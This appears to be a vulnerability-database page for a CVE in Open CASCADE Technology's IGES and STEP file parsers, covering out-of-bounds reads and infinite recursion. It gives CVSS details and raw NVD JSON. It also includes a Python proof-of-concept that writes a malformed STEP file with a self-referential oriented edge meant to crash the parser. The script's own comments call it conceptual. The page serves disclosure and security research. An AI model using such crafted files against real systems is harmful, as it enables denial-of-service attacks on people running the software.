Security Vulnerability Report
中文
CVE-2026-42481 CVSS 5.5 MEDIUM

CVE-2026-42481

Published: 2026-05-01 16:16:32
Last Modified: 2026-05-07 15:15:07
Source: [email protected]

Description

Open CASCADE Technology (OCCT) V8_0_0_rc5 contains multiple vulnerabilities in its IGES and STEP file parsers that can be triggered by crafted IGES or STEP files. These issues include an out-of-bounds read in Geom2d_BSplineCurve::EvalD0 during IGES B-spline curve evaluation, an out-of-bounds read in MakeBSplineCurveCommon during STEP B-spline curve construction, and infinite recursion in StepShape_OrientedEdge::EdgeStart when processing a self-referential OrientedEdge entity. Successful exploitation may result in denial of service or unintended memory disclosure.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Open CASCADE Technology V8_0_0_rc5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os # PoC for CVE-2026-42481: Open CASCADE Technology OCCT V8_0_0_rc5 Vulnerability # This script generates a malformed STEP file designed to trigger # infinite recursion in StepShape_OrientedEdge::EdgeStart # by creating a self-referential structure. malicious_step_content = """ISO-10303-21; HEADER; FILE_DESCRIPTION(('Open CASCADE Model'),'2;1'); FILE_NAME('exploit.step','2026-05-01',('Author'),('Organization'),'PreProcessor','Originating System','Authorization'); FILE_SCHEMA(('AUTOMOTIVE_DESIGN { 1 0 10303 214 1 1 1 1 }')); ENDSEC; DATA; /* Attempt to trigger infinite recursion via self-referential edge */ #1=CARTESIAN_POINT('',(0.E0,0.E0,0.E0)); #2=VERTEX_POINT('',#1); /* Self-referential definition attempt (Conceptual) */ /* In a real exploit, the specific entity IDs and structure would match the parser's logic */ #3=ORIENTED_EDGE('',*,*,#3,.T.); #4=EDGE_LOOP('',(#3)); #5=FACE_BOUND('',#4,.T.); ENDSEC; END-ISO-10303-21; """ def generate_poc(filename="cve_2026_42481_poc.step"): with open(filename, "w") as f: f.write(malicious_step_content) print(f"POC file generated: {filename}") print("Open this file with Open CASCADE Technology V8_0_0_rc5 to trigger the crash.") if __name__ == "__main__": generate_poc()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42481", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:32.163", "lastModified": "2026-05-07T15:15:06.770", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open CASCADE Technology (OCCT) V8_0_0_rc5 contains multiple vulnerabilities in its IGES and STEP file parsers that can be triggered by crafted IGES or STEP files. These issues include an out-of-bounds read in Geom2d_BSplineCurve::EvalD0 during IGES B-spline curve evaluation, an out-of-bounds read in MakeBSplineCurveCommon during STEP B-spline curve construction, and infinite recursion in StepShape_OrientedEdge::EdgeStart when processing a self-referential OrientedEdge entity. Successful exploitation may result in denial of service or unintended memory disclosure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://gist.github.com/sgInnora/dfba083d04906283e9c92aea78e2d94a", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.